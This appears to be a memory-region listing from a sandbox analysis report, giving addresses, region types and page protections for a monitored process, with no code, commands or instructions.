heap
page execute and read and write
E40000
heap
page read and write
6479000
trusted library allocation
page read and write
77EC000
trusted library allocation
page read and write
4730000
heap
page read and write
8A50000
heap
page read and write
2B88000
heap
page read and write
70CD000
stack
page read and write
600D000
heap
page read and write
3540000
trusted library allocation
page read and write
64C3000
heap
page read and write
5806000
trusted library allocation
page read and write
65DF000
heap
page read and write
3180000
trusted library allocation
page read and write
75C000
stack
page read and write
508E000
stack
page read and write
5FD2000
heap
page read and write
65BC000
heap
page read and write
65DF000
heap
page read and write
7CBE000
stack
page read and write
36E8000
trusted library allocation
page read and write
7390000
heap
page execute and read and write
5F88000
heap
page read and write
7CF0000
trusted library allocation
page read and write
343E000
stack
page read and write
474000
remote allocation
page execute and read and write
506F000
heap
page read and write
501D000
heap
page read and write
790E000
stack
page read and write
85DE000
direct allocation
page read and write
4F21000
trusted library allocation
page read and write
64C6000
heap
page read and write
2BA1000
heap
page read and write
65C4000
heap
page read and write
2C07000
heap
page read and write
65D6000
heap
page read and write
2D27000
heap
page read and write
2D41000
heap
page read and write
BB0000
heap
page read and write
5950000
heap
page read and write
789E000
stack
page read and write
519C000
trusted library allocation
page read and write
50F0000
trusted library allocation
page read and write
580A000
trusted library allocation
page read and write
65EA000
heap
page read and write
5F88000
heap
page read and write
5F93000
heap
page read and write
5169000
trusted library allocation
page read and write
5495000
heap
page read and write
3130000
heap
page read and write
619B000
trusted library allocation
page read and write
31D6000
heap
page read and write
8480000
heap
page read and write
E9C000
heap
page read and write
2BC3000
heap
page read and write
54A4000
heap
page read and write
7A30000
trusted library allocation
page read and write
8AC3000
heap
page read and write
2DFC000
heap
page read and write
4D3E000
stack
page read and write
65D6000
heap
page read and write
51EB000
heap
page read and write
65F9000
heap
page read and write
7EF00000
trusted library allocation
page execute and read and write
2B5E000
heap
page read and write
54EC000
heap
page read and write
652F000
heap
page read and write
7E20000
trusted library allocation
page read and write
5FC2000
heap
page read and write
5FD2000
heap
page read and write
3160000
heap
page read and write
2BA8000
heap
page read and write
2D8D000
heap
page read and write
5F2F000
heap
page read and write
653D000
heap
page read and write
6606000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
66C0000
trusted library allocation
page read and write
65B6000
heap
page read and write
7C7E000
stack
page read and write
4A9C000
stack
page read and write
5022000
heap
page read and write
33C8000
heap
page read and write
65A1000
heap
page read and write
7DC0000
trusted library allocation
page execute and read and write
5074000
heap
page read and write
3608000
heap
page read and write
5244000
trusted library allocation
page read and write
2E15000
heap
page read and write
657B000
heap
page read and write
6597000
heap
page read and write
5261000
heap
page read and write
5FD2000
heap
page read and write
65E1000
heap
page read and write
5321000
trusted library allocation
page read and write
D0D000
stack
page read and write
2BCB000
heap
page read and write
4C70000
trusted library allocation
page read and write
36CF000
stack
page read and write
8430000
trusted library allocation
page read and write
5FC2000
heap
page read and write
8730000
heap
page read and write
7C3B000
heap
page read and write
2B8A000
heap
page read and write
2E1C000
heap
page read and write
355A000
heap
page read and write
3370000
trusted library allocation
page read and write
8A75000
heap
page read and write
51C3000
heap
page read and write
30A9000
heap
page read and write
2DDB000
heap
page read and write
5F2B000
heap
page read and write
8B67000
heap
page read and write
679A000
trusted library allocation
page read and write
2BB7000
heap
page read and write
92D0000
heap
page read and write
5FD2000
heap
page read and write
15DE000
stack
page read and write
2E09000
heap
page read and write
65D6000
heap
page read and write
2BA1000
heap
page read and write
2D20000
heap
page read and write
8420000
trusted library allocation
page execute and read and write
54D4000
heap
page read and write
65CB000
heap
page read and write
600D000
heap
page read and write
65D8000
heap
page read and write
65A9000
heap
page read and write
795D000
stack
page read and write
50C5000
heap
page execute and read and write
29E0000
heap
page read and write
88A0000
trusted library allocation
page read and write
547D000
heap
page read and write
63F0000
trusted library allocation
page execute
65E6000
heap
page read and write
65CB000
heap
page read and write
5F89000
heap
page read and write
2ADF000
stack
page read and write
748C000
stack
page read and write
7CB0000
trusted library allocation
page read and write
7970000
trusted library allocation
page execute and read and write
8B7F000
heap
page read and write
7A22000
heap
page read and write
621F000
trusted library allocation
page read and write
2E08000
heap
page read and write
3510000
trusted library allocation
page read and write
72EE000
stack
page read and write
5BBF000
stack
page read and write
653D000
heap
page read and write
655B000
heap
page read and write
65CB000
heap
page read and write
531D000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
4A66000
heap
page read and write
2C34000
heap
page read and write
5388000
trusted library allocation
page read and write
791E000
stack
page read and write
658F000
heap
page read and write
5FC2000
heap
page read and write
5161000
heap
page read and write
537B000
trusted library allocation
page read and write
5F2F000
heap
page read and write
894F000
stack
page read and write
4C63000
trusted library allocation
page execute and read and write
2D30000
heap
page read and write
520B000
trusted library allocation
page read and write
31B0000
trusted library allocation
page read and write
2D04000
heap
page read and write
65E1000
heap
page read and write
64C6000
heap
page read and write
56C0000
trusted library allocation
page read and write
34E0000
trusted library allocation
page read and write
6031000
trusted library allocation
page read and write
30CD000
heap
page read and write
64A1000
heap
page read and write
2C36000
heap
page read and write
78CE000
stack
page read and write
7F3F8000
trusted library allocation
page execute and read and write
593B000
trusted library allocation
page read and write
E3F000
stack
page read and write
89B0000
trusted library allocation
page read and write
602A000
trusted library allocation
page read and write
5FC2000
heap
page read and write
2D08000
heap
page read and write
7E70000
trusted library allocation
page read and write
2D4F000
heap
page read and write
784E000
stack
page read and write
33A0000
trusted library allocation
page read and write
3550000
heap
page read and write
27EB000
stack
page read and write
5094000
heap
page read and write
724E000
stack
page read and write
50A8000
heap
page read and write
4EDF000
stack
page read and write
65EA000
heap
page read and write
5160000
heap
page read and write
73BE000
stack
page read and write
485E000
stack
page read and write
8A89000
heap
page read and write
747E000
stack
page read and write
2B30000
heap
page read and write
621B000
trusted library allocation
page read and write
50BA000
heap
page read and write
7D0000
heap
page read and write
37A8000
heap
page read and write
7BEE000
stack
page read and write
8750000
trusted library allocation
page read and write
2DF6000
heap
page read and write
2E1C000
heap
page read and write
65C4000
heap
page read and write
505C000
heap
page read and write
54EE000
heap
page read and write
65E6000
heap
page read and write
5F99000
heap
page read and write
8A22000
trusted library allocation
page read and write
3180000
heap
page read and write
7DE0000
trusted library allocation
page read and write
2D9B000
heap
page read and write
2C30000
heap
page read and write
50C5000
heap
page read and write
2B81000
heap
page read and write
2DE5000
heap
page read and write
55DE000
stack
page read and write
53E8000
trusted library allocation
page read and write
65B3000
heap
page read and write
2D90000
heap
page read and write
66F0000
trusted library allocation
page read and write
5FC2000
heap
page read and write
2D08000
heap
page read and write
7140000
direct allocation
page read and write
4C60000
heap
page read and write
65DD000
heap
page read and write
65E6000
heap
page read and write
8C70000
trusted library allocation
page read and write
4A60000
heap
page read and write
347E000
stack
page read and write
5FD2000
heap
page read and write
5FC3000
heap
page read and write
51C2000
heap
page read and write
4DE0000
heap
page read and write
51E8000
trusted library allocation
page read and write
7BA9000
heap
page read and write
2BA1000
heap
page read and write
5097000
heap
page read and write
6599000
heap
page read and write
7E50000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
500B000
heap
page read and write
65DD000
heap
page read and write
677F000
trusted library allocation
page read and write
3760000
heap
page read and write
2BB7000
heap
page read and write
7C70000
trusted library allocation
page read and write
653D000
heap
page read and write
5F30000
heap
page read and write
2C20000
heap
page read and write
54C1000
heap
page read and write
7E00000
trusted library allocation
page read and write
5630000
heap
page read and write
536C000
trusted library allocation
page read and write
4F9E000
stack
page read and write
65C4000
heap
page read and write
6001000
heap
page read and write
86EE000
stack
page read and write
EBE000
stack
page read and write
65BC000
heap
page read and write
65F9000
heap
page read and write
8F70000
trusted library allocation
page read and write
2D76000
heap
page read and write
7850000
heap
page execute and read and write
78B0000
heap
page execute and read and write
65A9000
heap
page read and write
8980000
trusted library allocation
page read and write
50A0000
heap
page read and write
6005000
heap
page read and write
7B99000
heap
page read and write
65CB000
heap
page read and write
6021000
trusted library allocation
page read and write
7125000
trusted library allocation
page read and write
54D4000
heap
page read and write
54EA000
heap
page read and write
65E0000
heap
page read and write
653D000
heap
page read and write
5167000
trusted library allocation
page read and write
3610000
heap
page read and write
2C60000
heap
page read and write
FEB000
stack
page read and write
5491000
heap
page read and write
2D90000
heap
page read and write
52DE000
heap
page read and write
52C8000
trusted library allocation
page read and write
2DF4000
heap
page read and write
7CD0000
trusted library allocation
page read and write
7E10000
trusted library allocation
page read and write
6006000
heap
page read and write
65E7000
heap
page read and write
755E000
stack
page read and write
5021000
heap
page read and write
743E000
stack
page read and write
65DD000
heap
page read and write
2DE3000
heap
page read and write
77E0000
trusted library allocation
page read and write
2DE6000
heap
page read and write
2B48000
heap
page read and write
84CD000
stack
page read and write
6599000
heap
page read and write
65B6000
heap
page read and write
7395000
heap
page execute and read and write
64C7000
heap
page read and write
75EC000
heap
page read and write
65C4000
heap
page read and write
2E0D000
heap
page read and write
5F99000
heap
page read and write
65BC000
heap
page read and write
E5D000
stack
page read and write
7961000
heap
page read and write
B38000
stack
page read and write
5F91000
heap
page read and write
6599000
heap
page read and write
65EA000
heap
page read and write
5155000
trusted library allocation
page read and write
3380000
heap
page readonly
622B000
trusted library allocation
page read and write
55DE000
stack
page read and write
7DF0000
trusted library allocation
page read and write
65B6000
heap
page read and write
6599000
heap
page read and write
8B0D000
heap
page read and write
65F9000
heap
page read and write
6002000
heap
page read and write
5440000
heap
page read and write
2D0A000
heap
page read and write
7A10000
trusted library allocation
page read and write
BFE000
stack
page read and write
6F9E000
stack
page read and write
701F000
stack
page read and write
CA0000
heap
page read and write
54C0000
heap
page read and write
4BD0000
heap
page read and write
7CE0000
trusted library allocation
page read and write
85B0000
direct allocation
page read and write
2B81000
heap
page read and write
656A000
heap
page read and write
6023000
trusted library allocation
page read and write
318F000
heap
page read and write
8770000
heap
page read and write
74CD000
stack
page read and write
5400000
direct allocation
page read and write
779B000
stack
page read and write
653B000
heap
page read and write
4D80000
trusted library allocation
page execute and read and write
7E40000
trusted library allocation
page read and write
E1C000
stack
page read and write
7E30000
trusted library allocation
page read and write
65B6000
heap
page read and write
2D70000
heap
page read and write
7B40000
heap
page read and write
29E5000
heap
page read and write
8B52000
heap
page read and write
65EA000
heap
page read and write
71CE000
stack
page read and write
3080000
heap
page read and write
4A1E000
stack
page read and write
65EA000
heap
page read and write
2E00000
heap
page read and write
65BC000
heap
page read and write
34BF000
stack
page read and write
5BFB000
stack
page read and write
50B8000
heap
page read and write
7350000
heap
page read and write
ED0000
heap
page read and write
368E000
stack
page read and write
79F0000
trusted library allocation
page read and write
3155000
heap
page read and write
65B3000
heap
page read and write
7937000
heap
page read and write
65FE000
trusted library allocation
page read and write
2C2B000
heap
page read and write
3199000
trusted library allocation
page read and write
905B000
stack
page read and write
30A0000
heap
page read and write
5F25000
heap
page read and write
7951000
heap
page read and write
501B000
heap
page read and write
528E000
trusted library allocation
page read and write
7122000
direct allocation
page read and write
32BF000
stack
page read and write
6025000
trusted library allocation
page read and write
602E000
trusted library allocation
page read and write
1030000
heap
page read and write
6533000
heap
page read and write
6564000
heap
page read and write
64A0000
heap
page read and write
3740000
trusted library allocation
page execute and read and write
8FFF000
stack
page read and write
7E90000
trusted library allocation
page read and write
72E0000
direct allocation
page read and write
309E000
stack
page read and write
6005000
heap
page read and write
6528000
heap
page read and write
30D2000
heap
page read and write
4A64000
heap
page read and write
1330000
heap
page read and write
6542000
heap
page read and write
DB0000
heap
page read and write
65ED000
heap
page read and write
65BC000
heap
page read and write
6005000
heap
page read and write
2A2E000
stack
page read and write
65DF000
heap
page read and write
F47000
heap
page read and write
7111000
trusted library allocation
page read and write
4AE0000
trusted library allocation
page execute and read and write
3581000
heap
page read and write
2BA6000
heap
page read and write
770E000
stack
page read and write
4DB0000
heap
page read and write
65B5000
heap
page read and write
7480000
heap
page read and write
6003000
heap
page read and write
85DE000
direct allocation
page read and write
7E60000
trusted library allocation
page read and write
534E000
trusted library allocation
page read and write
50C0000
heap
page execute and read and write
5369000
trusted library allocation
page read and write
2E0C000
heap
page read and write
9110000
trusted library allocation
page read and write
5013000
heap
page read and write
5F99000
heap
page read and write
63B0000
trusted library allocation
page read and write
5075000
heap
page read and write
65D8000
heap
page read and write
2D20000
heap
page read and write
4FA0000
heap
page read and write
74DD000
stack
page read and write
78C0000
trusted library allocation
page read and write
65D6000
heap
page read and write
65E6000
trusted library allocation
page read and write
50DD000
heap
page read and write
6FDE000
stack
page read and write
4A5E000
stack
page read and write
909C000
stack
page read and write
64C1000
heap
page read and write
546F000
heap
page read and write
E70000
heap
page read and write
7960000
trusted library allocation
page read and write
538C000
trusted library allocation
page read and write
2B88000
heap
page read and write
5077000
trusted library allocation
page read and write
532D000
trusted library allocation
page read and write
65B6000
heap
page read and write
5F2F000
heap
page read and write
65A7000
heap
page read and write
54D6000
heap
page read and write
50BD000
heap
page read and write
65CB000
heap
page read and write
600D000
heap
page read and write
6131000
trusted library allocation
page read and write
65F9000
heap
page read and write
5021000
heap
page read and write
4FE1000
heap
page read and write
652F000
heap
page read and write
5F93000
heap
page read and write
65EA000
heap
page read and write
5F99000
heap
page read and write
65BC000
heap
page read and write
8B2D000
heap
page read and write
610E000
stack
page read and write
F9D000
stack
page read and write
4D70000
heap
page execute and read and write
5FC2000
heap
page read and write
2BB7000
heap
page read and write
2BCB000
heap
page read and write
5498000
heap
page read and write
2BCB000
heap
page read and write
5482000
heap
page read and write
513E000
trusted library allocation
page read and write
55A7000
trusted library allocation
page read and write
4D04000
heap
page read and write
2BA1000
heap
page read and write
741B000
stack
page read and write
5F93000
heap
page read and write
8C60000
trusted library allocation
page read and write
2DF9000
heap
page read and write
6CDC000
stack
page read and write
54C9000
heap
page read and write
65F7000
trusted library allocation
page read and write
73DD000
stack
page read and write
2F1E000
stack
page read and write
79D0000
trusted library allocation
page read and write
5FD2000
heap
page read and write
65D8000
heap
page read and write
65BC000
heap
page read and write
7C90000
trusted library allocation
page read and write
5077000
heap
page read and write
539C000
stack
page read and write
2DEE000
heap
page read and write
658E000
heap
page read and write
31B2000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8470000
heap
page read and write
2C3E000
heap
page read and write
2E08000
heap
page read and write
761E000
stack
page read and write
7B30000
trusted library allocation
page read and write
5FC2000
heap
page read and write
93EC000
stack
page read and write
65F9000
heap
page read and write
548E000
heap
page read and write
5066000
heap
page read and write
2D0B000
heap
page read and write
8880000
trusted library allocation
page execute and read and write
AFC000
stack
page read and write
501D000
heap
page read and write
507C000
heap
page read and write
7C80000
trusted library allocation
page execute and read and write
5131000
trusted library allocation
page read and write
4C90000
trusted library allocation
page read and write
65DF000
heap
page read and write
5460000
heap
page read and write
65C0000
heap
page read and write
6035000
trusted library allocation
page read and write
2E7E000
stack
page read and write
4ADE000
stack
page read and write
5145000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
86AE000
stack
page read and write
E0C000
stack
page read and write
500F000
stack
page read and write
CA5000
heap
page read and write
653B000
heap
page read and write
65CB000
heap
page read and write
593D000
trusted library allocation
page read and write
6003000
heap
page read and write
7961000
heap
page read and write
5FD3000
heap
page read and write
65F5000
heap
page read and write
600D000
heap
page read and write
13E0000
heap
page read and write
5FC2000
heap
page read and write
6564000
heap
page read and write
65C1000
heap
page read and write
6599000
heap
page read and write
4F8D000
stack
page read and write
65B3000
heap
page read and write
31A0000
heap
page read and write
E58000
stack
page read and write
54B5000
trusted library allocation
page read and write
65E6000
heap
page read and write
8A70000
heap
page read and write
5F99000
heap
page read and write
2C3A000
heap
page read and write
7D20000
trusted library allocation
page read and write
65DD000
heap
page read and write
50B0000
heap
page read and write
2C05000
heap
page read and write
2C11000
heap
page read and write
2B72000
heap
page read and write
600D000
heap
page read and write
5488000
heap
page read and write
7690000
heap
page read and write
5FC2000
heap
page read and write
50D9000
heap
page read and write
653D000
heap
page read and write
732F000
stack
page read and write
54DE000
heap
page read and write
8B6F000
heap
page read and write
64BA000
trusted library allocation
page read and write
65F3000
heap
page read and write
3590000
heap
page read and write
7D3E000
stack
page read and write
7120000
trusted library allocation
page read and write
7126000
direct allocation
page read and write
2BB5000
heap
page read and write
600D000
heap
page read and write
65C4000
heap
page read and write
7CC0000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
3647000
heap
page read and write
2CEE000
stack
page read and write
2D0C000
heap
page read and write
65FF000
heap
page read and write
782D000
stack
page read and write
6001000
heap
page read and write
2D09000
heap
page read and write
50DB000
heap
page read and write
65CB000
heap
page read and write
5011000
heap
page read and write
2B9B000
heap
page read and write
2D40000
heap
page read and write
4CB0000
trusted library allocation
page read and write
65DF000
heap
page read and write
8870000
heap
page read and write
505F000
stack
page read and write
BBC000
stack
page read and write
64CB000
heap
page read and write
33A8000
trusted library allocation
page read and write
5F21000
trusted library allocation
page read and write
7AF0000
heap
page read and write
65F9000
heap
page read and write
7D50000
trusted library allocation
page read and write
761F000
stack
page read and write
7951000
heap
page read and write
54E3000
heap
page read and write
5107000
heap
page read and write
600D000
heap
page read and write
3183000
trusted library allocation
page execute and read and write
2B80000
heap
page read and write
77EA000
trusted library allocation
page read and write
50DD000
heap
page read and write
53FA000
stack
page read and write
5B00000
heap
page read and write
54B8000
heap
page read and write
2D41000
heap
page read and write
4C50000
trusted library allocation
page read and write
54C3000
heap
page read and write
5FE2000
heap
page read and write
65C4000
heap
page read and write
64C9000
heap
page read and write
2C34000
heap
page read and write
5F87000
heap
page read and write
6533000
heap
page read and write
F00000
heap
page read and write
54DD000
stack
page read and write
318D000
trusted library allocation
page execute and read and write
351A000
trusted library allocation
page execute and read and write
5F32000
heap
page read and write
5498000
trusted library allocation
page read and write
505B000
heap
page read and write
755D000
stack
page read and write
501B000
heap
page read and write
2E1D000
heap
page read and write
65D8000
heap
page read and write
7CFE000
stack
page read and write
5481000
heap
page read and write
5F32000
heap
page read and write
31E0000
heap
page read and write
53B7000
trusted library allocation
page read and write
64F5000
heap
page read and write
8B25000
heap
page read and write
60C9000
trusted library allocation
page read and write
2DF9000
heap
page read and write
595F000
stack
page read and write
65EA000
heap
page read and write
8A30000
trusted library section
page read and write
784E000
stack
page read and write
6430000
trusted library allocation
page read and write
33CA000
heap
page read and write
305E000
stack
page read and write
720A000
stack
page read and write
75FB000
heap
page read and write
54BF000
heap
page read and write
5069000
heap
page read and write
2B7E000
heap
page read and write
51FD000
heap
page read and write
620F000
stack
page read and write
65B3000
heap
page read and write
8E6E000
stack
page read and write
7710000
heap
page read and write
4FCE000
stack
page read and write
2BC3000
heap
page read and write
65EA000
heap
page read and write
7C0C000
heap
page read and write
6004000
heap
page read and write
65DD000
heap
page read and write
6001000
heap
page read and write
4750000
heap
page read and write
6D95000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
64A1000
heap
page read and write
EC0000
heap
page read and write
65D8000
heap
page read and write
54C4000
heap
page read and write
5470000
heap
page read and write
2BB9000
heap
page read and write
7F3E0000
trusted library allocation
page execute and read and write
897B000
trusted library allocation
page read and write
4C79000
trusted library allocation
page read and write
7910000
heap
page read and write
478000
remote allocation
page execute and read and write
5874000
trusted library allocation
page read and write
7975000
heap
page read and write
4C95000
trusted library allocation
page execute and read and write
2B86000
heap
page read and write
8950000
heap
page read and write
6757000
trusted library allocation
page read and write
76DE000
stack
page read and write
8B5E000
heap
page read and write
75A0000
trusted library allocation
page read and write
8A80000
heap
page read and write
65F9000
heap
page read and write
2B5E000
heap
page read and write
4D50000
heap
page read and write
7990000
trusted library allocation
page read and write
5F93000
heap
page read and write
7BAE000
stack
page read and write
2AFB000
stack
page read and write
7DD0000
trusted library allocation
page read and write
65D0000
heap
page read and write
6584000
heap
page read and write
6531000
heap
page read and write
2E0B000
heap
page read and write
65F9000
heap
page read and write
51FA000
trusted library allocation
page read and write
EB0000
heap
page read and write
DAF000
stack
page read and write
There are 1113 hidden memdumps, click here to show them.